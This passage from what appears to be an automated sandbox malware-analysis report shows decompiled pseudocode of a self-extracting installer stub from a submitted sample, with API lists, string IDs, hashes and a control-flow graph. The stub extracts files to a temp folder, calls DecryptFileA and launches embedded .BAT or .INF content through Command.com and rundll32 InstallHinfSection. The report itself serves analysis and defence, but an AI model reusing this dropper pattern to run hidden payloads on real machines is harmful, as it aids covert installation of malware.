                                                                                                                                                                                                    						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                    							_t139 = 0x2e;
                                                                                                                                                                                                    							_t115 = _t156;
                                                                                                                                                                                                    							_t58 = E00FD66C8(_t115, _t139);
                                                                                                                                                                                                    							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                    								if(_t156 == 0) {
                                                                                                                                                                                                    									goto L43;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                    								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                    									E00FD1680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_push(_t115);
                                                                                                                                                                                                    									_t108 = 0x400;
                                                                                                                                                                                                    									E00FD1781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                    									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                    										E00FD16B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                    										E00FD16B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t140 = _t156;
                                                                                                                                                                                                    								 *_t156 = 0;
                                                                                                                                                                                                    								E00FD2AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                    								goto L53;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t108 = "Command.com /c %s";
                                                                                                                                                                                                    								_t125 = "Command.com /c %s";
                                                                                                                                                                                                    								_t145 = _t125 + 1;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t76 =  *_t125;
                                                                                                                                                                                                    									_t125 = _t125 + 1;
                                                                                                                                                                                                    								} while (_t76 != 0);
                                                                                                                                                                                                    								_t126 = _t125 - _t145;
                                                                                                                                                                                                    								_t146 =  &_v268;
                                                                                                                                                                                                    								_t157 = _t146 + 1;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t77 =  *_t146;
                                                                                                                                                                                                    									_t146 = _t146 + 1;
                                                                                                                                                                                                    								} while (_t77 != 0);
                                                                                                                                                                                                    								_t140 = _t146 - _t157;
                                                                                                                                                                                                    								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                    								if(_t156 != 0) {
                                                                                                                                                                                                    									E00FD171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                    									goto L53;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L43;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                    								_t140 = 0x525;
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_t60 =  &_v268;
                                                                                                                                                                                                    								goto L35;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t140 = "[";
                                                                                                                                                                                                    								_v1556 = _t151;
                                                                                                                                                                                                    								_t90 = E00FD1A84( &_v1556, "[");
                                                                                                                                                                                                    								if(_t90 != 0) {
                                                                                                                                                                                                    									if( *_t90 != 0) {
                                                                                                                                                                                                    										_v1556 = _t90;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t140 = "]";
                                                                                                                                                                                                    									E00FD1A84( &_v1556, "]");
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                    								if(_t156 == 0) {
                                                                                                                                                                                                    									L43:
                                                                                                                                                                                                    									_t60 = 0;
                                                                                                                                                                                                    									_t140 = 0x4b5;
                                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                                    									_push(0x10);
                                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                                    									L35:
                                                                                                                                                                                                    									_push(_t60);
                                                                                                                                                                                                    									E00FD44B9(0, _t140);
                                                                                                                                                                                                    									_t62 = 0;
                                                                                                                                                                                                    									goto L54;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t155 = _v1556;
                                                                                                                                                                                                    									_t92 = _t155;
                                                                                                                                                                                                    									if( *_t155 == 0) {
                                                                                                                                                                                                    										_t92 = "DefaultInstall";
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									 *0xfd9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                    									 *_v1560 = 1;
                                                                                                                                                                                                    									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xfd1140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                    										 *0xfd9a34 =  *0xfd9a34 & 0xfffffffb;
                                                                                                                                                                                                    										if( *0xfd9a40 != 0) {
                                                                                                                                                                                                    											_t108 = "setupapi.dll";
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t108 = "setupx.dll";
                                                                                                                                                                                                    											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										if( *_t155 == 0) {
                                                                                                                                                                                                    											_t155 = "DefaultInstall";
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_push( &_v268);
                                                                                                                                                                                                    										_push(_t155);
                                                                                                                                                                                                    										E00FD171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										 *0xfd9a34 =  *0xfd9a34 | 0x00000004;
                                                                                                                                                                                                    										if( *_t155 == 0) {
                                                                                                                                                                                                    											_t155 = "DefaultInstall";
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										E00FD1680(_t108, 0x104, _t155);
                                                                                                                                                                                                    										_t140 = 0x200;
                                                                                                                                                                                                    										E00FD1680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									L53:
                                                                                                                                                                                                    									_t62 = 1;
                                                                                                                                                                                                    									 *_v1564 = _t156;
                                                                                                                                                                                                    									L54:
                                                                                                                                                                                                    									_pop(_t152);
                                                                                                                                                                                                    									return E00FD6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}














































                                                                                                                                                                                                    0x00fd1af3
                                                                                                                                                                                                    0x00fd1afa
                                                                                                                                                                                                    0x00fd1b07
                                                                                                                                                                                                    0x00fd1b09
                                                                                                                                                                                                    0x00fd1b1a
                                                                                                                                                                                                    0x00fd1b20
                                                                                                                                                                                                    0x00fd1b2c
                                                                                                                                                                                                    0x00fd1b3b
                                                                                                                                                                                                    0x00fd1b40
                                                                                                                                                                                                    0x00fd1b2e
                                                                                                                                                                                                    0x00fd1b2e
                                                                                                                                                                                                    0x00fd1b33
                                                                                                                                                                                                    0x00fd1b33
                                                                                                                                                                                                    0x00fd1b46
                                                                                                                                                                                                    0x00fd1b4c
                                                                                                                                                                                                    0x00fd1b52
                                                                                                                                                                                                    0x00fd1b57
                                                                                                                                                                                                    0x00fd1b5d
                                                                                                                                                                                                    0x00fd1b61
                                                                                                                                                                                                    0x00fd1b9f
                                                                                                                                                                                                    0x00fd1b9f
                                                                                                                                                                                                    0x00fd1bb1
                                                                                                                                                                                                    0x00fd1bc2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1b63
                                                                                                                                                                                                    0x00fd1b63
                                                                                                                                                                                                    0x00fd1b65
                                                                                                                                                                                                    0x00fd1b68
                                                                                                                                                                                                    0x00fd1b68
                                                                                                                                                                                                    0x00fd1b6a
                                                                                                                                                                                                    0x00fd1b6b
                                                                                                                                                                                                    0x00fd1b6f
                                                                                                                                                                                                    0x00fd1b74
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1b76
                                                                                                                                                                                                    0x00fd1b7b
                                                                                                                                                                                                    0x00fd1b86
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1b8c
                                                                                                                                                                                                    0x00fd1b8c
                                                                                                                                                                                                    0x00fd1b98
                                                                                                                                                                                                    0x00fd1bc7
                                                                                                                                                                                                    0x00fd1bc9
                                                                                                                                                                                                    0x00fd1bcc
                                                                                                                                                                                                    0x00fd1bd3
                                                                                                                                                                                                    0x00fd1d75
                                                                                                                                                                                                    0x00fd1d76
                                                                                                                                                                                                    0x00fd1d78
                                                                                                                                                                                                    0x00fd1d7f
                                                                                                                                                                                                    0x00fd1e05
                                                                                                                                                                                                    0x00fd1e09
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1e12
                                                                                                                                                                                                    0x00fd1e1b
                                                                                                                                                                                                    0x00fd1e73
                                                                                                                                                                                                    0x00fd1e21
                                                                                                                                                                                                    0x00fd1e21
                                                                                                                                                                                                    0x00fd1e28
                                                                                                                                                                                                    0x00fd1e37
                                                                                                                                                                                                    0x00fd1e3e
                                                                                                                                                                                                    0x00fd1e52
                                                                                                                                                                                                    0x00fd1e60
                                                                                                                                                                                                    0x00fd1e60
                                                                                                                                                                                                    0x00fd1e3e
                                                                                                                                                                                                    0x00fd1e79
                                                                                                                                                                                                    0x00fd1e7b
                                                                                                                                                                                                    0x00fd1e84
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1d9b
                                                                                                                                                                                                    0x00fd1d9b
                                                                                                                                                                                                    0x00fd1da0
                                                                                                                                                                                                    0x00fd1da2
                                                                                                                                                                                                    0x00fd1da5
                                                                                                                                                                                                    0x00fd1da5
                                                                                                                                                                                                    0x00fd1da7
                                                                                                                                                                                                    0x00fd1da8
                                                                                                                                                                                                    0x00fd1dac
                                                                                                                                                                                                    0x00fd1dae
                                                                                                                                                                                                    0x00fd1db4
                                                                                                                                                                                                    0x00fd1db7
                                                                                                                                                                                                    0x00fd1db7
                                                                                                                                                                                                    0x00fd1db9
                                                                                                                                                                                                    0x00fd1dba
                                                                                                                                                                                                    0x00fd1dbe
                                                                                                                                                                                                    0x00fd1dc3
                                                                                                                                                                                                    0x00fd1dce
                                                                                                                                                                                                    0x00fd1dd2
                                                                                                                                                                                                    0x00fd1deb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1df0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1dd2
                                                                                                                                                                                                    0x00fd1bf7
                                                                                                                                                                                                    0x00fd1bfe
                                                                                                                                                                                                    0x00fd1c07
                                                                                                                                                                                                    0x00fd1d55
                                                                                                                                                                                                    0x00fd1d5a
                                                                                                                                                                                                    0x00fd1d5b
                                                                                                                                                                                                    0x00fd1d5d
                                                                                                                                                                                                    0x00fd1d5e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1c1b
                                                                                                                                                                                                    0x00fd1c1b
                                                                                                                                                                                                    0x00fd1c20
                                                                                                                                                                                                    0x00fd1c2c
                                                                                                                                                                                                    0x00fd1c33
                                                                                                                                                                                                    0x00fd1c38
                                                                                                                                                                                                    0x00fd1c3a
                                                                                                                                                                                                    0x00fd1c3a
                                                                                                                                                                                                    0x00fd1c40
                                                                                                                                                                                                    0x00fd1c4b
                                                                                                                                                                                                    0x00fd1c4b
                                                                                                                                                                                                    0x00fd1c5d
                                                                                                                                                                                                    0x00fd1c61
                                                                                                                                                                                                    0x00fd1dd4
                                                                                                                                                                                                    0x00fd1dd4
                                                                                                                                                                                                    0x00fd1dd6
                                                                                                                                                                                                    0x00fd1ddb
                                                                                                                                                                                                    0x00fd1ddc
                                                                                                                                                                                                    0x00fd1dde
                                                                                                                                                                                                    0x00fd1d64
                                                                                                                                                                                                    0x00fd1d64
                                                                                                                                                                                                    0x00fd1d67
                                                                                                                                                                                                    0x00fd1d6c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1c67
                                                                                                                                                                                                    0x00fd1c67
                                                                                                                                                                                                    0x00fd1c6d
                                                                                                                                                                                                    0x00fd1c72
                                                                                                                                                                                                    0x00fd1c74
                                                                                                                                                                                                    0x00fd1c74
                                                                                                                                                                                                    0x00fd1c8e
                                                                                                                                                                                                    0x00fd1c99
                                                                                                                                                                                                    0x00fd1cc0
                                                                                                                                                                                                    0x00fd1cf8
                                                                                                                                                                                                    0x00fd1d07
                                                                                                                                                                                                    0x00fd1d23
                                                                                                                                                                                                    0x00fd1d09
                                                                                                                                                                                                    0x00fd1d14
                                                                                                                                                                                                    0x00fd1d1b
                                                                                                                                                                                                    0x00fd1d1b
                                                                                                                                                                                                    0x00fd1d2b
                                                                                                                                                                                                    0x00fd1d2d
                                                                                                                                                                                                    0x00fd1d2d
                                                                                                                                                                                                    0x00fd1d38
                                                                                                                                                                                                    0x00fd1d39
                                                                                                                                                                                                    0x00fd1d46
                                                                                                                                                                                                    0x00fd1cc2
                                                                                                                                                                                                    0x00fd1cc2
                                                                                                                                                                                                    0x00fd1ccc
                                                                                                                                                                                                    0x00fd1cce
                                                                                                                                                                                                    0x00fd1cce
                                                                                                                                                                                                    0x00fd1cdb
                                                                                                                                                                                                    0x00fd1ce6
                                                                                                                                                                                                    0x00fd1cee
                                                                                                                                                                                                    0x00fd1cee
                                                                                                                                                                                                    0x00fd1e89
                                                                                                                                                                                                    0x00fd1e91
                                                                                                                                                                                                    0x00fd1e92
                                                                                                                                                                                                    0x00fd1e94
                                                                                                                                                                                                    0x00fd1e97
                                                                                                                                                                                                    0x00fd1ea4
                                                                                                                                                                                                    0x00fd1ea4
                                                                                                                                                                                                    0x00fd1c61
                                                                                                                                                                                                    0x00fd1c07
                                                                                                                                                                                                    0x00fd1bd3
                                                                                                                                                                                                    0x00fd1b7b

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00FD1BE7
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00FD1BFE
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00FD1C57
                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00FD1C88
                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00FD1140,00000000,00000008,?), ref: 00FD1CB8
                                                                                                                                                                                                    • GetShortPathNameA.KERNEL32 ref: 00FD1D1B
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
                                                                                                                                                                                                      • Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                    • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                    • API String ID: 383838535-3401884814
                                                                                                                                                                                                    • Opcode ID: c8b59be3ecd7402891224441410b6a4da130b086deb95bc5b298249001c79447
                                                                                                                                                                                                    • Instruction ID: f9149fba818da065279cf605ccd6695ddd1f631f902359c6b4415a4d580f2109
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8b59be3ecd7402891224441410b6a4da130b086deb95bc5b298249001c79447
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49A14B71E002187BEB209B24CC44FEA776BBB95320F1C4297E555A33D1DBB49D89EB50
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 406 fd2f1d-fd2f3d 407 fd2f6c-fd2f73 call fd5164 406->407 408 fd2f3f-fd2f46 406->408 417 fd2f79-fd2f80 call fd55a0 407->417 418 fd3041 407->418 409 fd2f5f-fd2f66 call fd3a3f 408->409 410 fd2f48 call fd51e5 408->410 409->407 409->418 415 fd2f4d-fd2f4f 410->415 415->418 420 fd2f55-fd2f5d 415->420 417->418 425 fd2f86-fd2fbe GetSystemDirectoryA call fd658a LoadLibraryA 417->425 419 fd3043-fd3053 call fd6ce0 418->419 420->407 420->409 428 fd2ff7-fd3004 FreeLibrary 425->428 429 fd2fc0-fd2fd4 GetProcAddress 425->429 431 fd3017-fd3024 SetCurrentDirectoryA 428->431 432 fd3006-fd300c 428->432 429->428 430 fd2fd6-fd2fee DecryptFileA 429->430 430->428 441 fd2ff0-fd2ff5 430->441 434 fd3054-fd305a 431->434 435 fd3026-fd303c call fd44b9 call fd6285 431->435 432->431 433 fd300e call fd621e 432->433 445 fd3013-fd3015 433->445 437 fd305c call fd3b26 434->437 438 fd3065-fd306c 434->438 435->418 447 fd3061-fd3063 437->447 443 fd307c-fd3089 438->443 444 fd306e-fd3075 call fd256d 438->444 441->428 449 fd308b-fd3091 443->449 450 fd30a1-fd30a9 443->450 454 fd307a 444->454 445->418 445->431 447->418 447->438 449->450 455 fd3093 call fd3ba2 449->455 452 fd30ab-fd30ad 450->452 453 fd30b4-fd30b7 450->453 452->453 457 fd30af call fd4169 452->457 453->419 454->443 459 fd3098-fd309a 455->459 457->453 459->418 461 fd309c 459->461 461->450
                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E00FD2F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v272;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				struct HWND__* _t12;
                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				signed int _t22;
                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                    				intOrPtr _t41;
                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                    				int _t47;
                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t43 = __edx;
                                                                                                                                                                                                    				_t9 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                    				if( *0xfd8a38 != 0) {
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					_t11 = E00FD5164(_t52);
                                                                                                                                                                                                    					_t53 = _t11;
                                                                                                                                                                                                    					if(_t11 == 0) {
                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                    						_t12 = 0;
                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                    						return E00FD6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t14 = E00FD55A0(_t53); // executed
                                                                                                                                                                                                    					if(_t14 == 0) {
                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t45 = 0x105;
                                                                                                                                                                                                    						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                    						_t43 = 0x105;
                                                                                                                                                                                                    						_t40 =  &_v272;
                                                                                                                                                                                                    						E00FD658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                    						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                    						_t44 = 0;
                                                                                                                                                                                                    						if(_t36 != 0) {
                                                                                                                                                                                                    							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                    							_v276 = _t31;
                                                                                                                                                                                                    							if(_t31 != 0) {
                                                                                                                                                                                                    								_t45 = _t47;
                                                                                                                                                                                                    								_t40 = _t31;
                                                                                                                                                                                                    								 *0xfda288("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\", 0); // executed
                                                                                                                                                                                                    								_v276();
                                                                                                                                                                                                    								if(_t47 != _t47) {
                                                                                                                                                                                                    									_t40 = 4;
                                                                                                                                                                                                    									asm("int 0x29");
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						FreeLibrary(_t36);
                                                                                                                                                                                                    						_t58 =  *0xfd8a24 - _t44; // 0x0
                                                                                                                                                                                                    						if(_t58 != 0) {
                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                    							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\"); // executed
                                                                                                                                                                                                    							if(_t21 != 0) {
                                                                                                                                                                                                    								__eflags =  *0xfd8a2c - _t44; // 0x0
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									L20:
                                                                                                                                                                                                    									__eflags =  *0xfd8d48 & 0x000000c0;
                                                                                                                                                                                                    									if(( *0xfd8d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                    										_t41 =  *0xfd9a40; // 0x3, executed
                                                                                                                                                                                                    										_t26 = E00FD256D(_t41); // executed
                                                                                                                                                                                                    										_t44 = _t26;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t22 =  *0xfd8a24; // 0x0
                                                                                                                                                                                                    									 *0xfd9a44 = _t44;
                                                                                                                                                                                                    									__eflags = _t22;
                                                                                                                                                                                                    									if(_t22 != 0) {
                                                                                                                                                                                                    										L26:
                                                                                                                                                                                                    										__eflags =  *0xfd8a38;
                                                                                                                                                                                                    										if( *0xfd8a38 == 0) {
                                                                                                                                                                                                    											__eflags = _t22;
                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                    												E00FD4169(__eflags);
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t12 = 1;
                                                                                                                                                                                                    										goto L17;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										__eflags =  *0xfd9a30 - _t22; // 0x0
                                                                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                                                                    											goto L26;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t25 = E00FD3BA2(); // executed
                                                                                                                                                                                                    										__eflags = _t25;
                                                                                                                                                                                                    										if(_t25 == 0) {
                                                                                                                                                                                                    											goto L16;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t22 =  *0xfd8a24; // 0x0
                                                                                                                                                                                                    										goto L26;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t27 = E00FD3B26(_t40, _t44);
                                                                                                                                                                                                    								__eflags = _t27;
                                                                                                                                                                                                    								if(_t27 == 0) {
                                                                                                                                                                                                    									goto L16;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t43 = 0x4bc;
                                                                                                                                                                                                    							E00FD44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                    							 *0xfd9124 = E00FD6285();
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t59 =  *0xfd9a30 - _t44; // 0x0
                                                                                                                                                                                                    						if(_t59 != 0) {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t30 = E00FD621E(); // executed
                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t49 =  *0xfd8a24;
                                                                                                                                                                                                    				if( *0xfd8a24 != 0) {
                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                    					_t34 = E00FD3A3F(_t51);
                                                                                                                                                                                                    					_t52 = _t34;
                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(E00FD51E5(_t49) == 0) {
                                                                                                                                                                                                    					goto L16;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t51 =  *0xfd8a38;
                                                                                                                                                                                                    				if( *0xfd8a38 != 0) {
                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L4;
                                                                                                                                                                                                    			}




























                                                                                                                                                                                                    0x00fd2f1d
                                                                                                                                                                                                    0x00fd2f28
                                                                                                                                                                                                    0x00fd2f2f
                                                                                                                                                                                                    0x00fd2f3d
                                                                                                                                                                                                    0x00fd2f6c
                                                                                                                                                                                                    0x00fd2f6c
                                                                                                                                                                                                    0x00fd2f71
                                                                                                                                                                                                    0x00fd2f73
                                                                                                                                                                                                    0x00fd3041
                                                                                                                                                                                                    0x00fd3041
                                                                                                                                                                                                    0x00fd3043
                                                                                                                                                                                                    0x00fd3053
                                                                                                                                                                                                    0x00fd3053
                                                                                                                                                                                                    0x00fd2f79
                                                                                                                                                                                                    0x00fd2f80
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2f86
                                                                                                                                                                                                    0x00fd2f86
                                                                                                                                                                                                    0x00fd2f93
                                                                                                                                                                                                    0x00fd2f9e
                                                                                                                                                                                                    0x00fd2fa0
                                                                                                                                                                                                    0x00fd2fa6
                                                                                                                                                                                                    0x00fd2fb8
                                                                                                                                                                                                    0x00fd2fba
                                                                                                                                                                                                    0x00fd2fbe
                                                                                                                                                                                                    0x00fd2fc6
                                                                                                                                                                                                    0x00fd2fcc
                                                                                                                                                                                                    0x00fd2fd4
                                                                                                                                                                                                    0x00fd2fd6
                                                                                                                                                                                                    0x00fd2fd8
                                                                                                                                                                                                    0x00fd2fe0
                                                                                                                                                                                                    0x00fd2fe6
                                                                                                                                                                                                    0x00fd2fee
                                                                                                                                                                                                    0x00fd2ff0
                                                                                                                                                                                                    0x00fd2ff5
                                                                                                                                                                                                    0x00fd2ff5
                                                                                                                                                                                                    0x00fd2fee
                                                                                                                                                                                                    0x00fd2fd4
                                                                                                                                                                                                    0x00fd2ff8
                                                                                                                                                                                                    0x00fd2ffe
                                                                                                                                                                                                    0x00fd3004
                                                                                                                                                                                                    0x00fd3017
                                                                                                                                                                                                    0x00fd301c
                                                                                                                                                                                                    0x00fd3024
                                                                                                                                                                                                    0x00fd3054
                                                                                                                                                                                                    0x00fd305a
                                                                                                                                                                                                    0x00fd3065
                                                                                                                                                                                                    0x00fd3065
                                                                                                                                                                                                    0x00fd306c
                                                                                                                                                                                                    0x00fd306e
                                                                                                                                                                                                    0x00fd3075
                                                                                                                                                                                                    0x00fd307a
                                                                                                                                                                                                    0x00fd307a
                                                                                                                                                                                                    0x00fd307c
                                                                                                                                                                                                    0x00fd3081
                                                                                                                                                                                                    0x00fd3087
                                                                                                                                                                                                    0x00fd3089
                                                                                                                                                                                                    0x00fd30a1
                                                                                                                                                                                                    0x00fd30a1
                                                                                                                                                                                                    0x00fd30a9
                                                                                                                                                                                                    0x00fd30ab
                                                                                                                                                                                                    0x00fd30ad
                                                                                                                                                                                                    0x00fd30af
                                                                                                                                                                                                    0x00fd30af
                                                                                                                                                                                                    0x00fd30ad
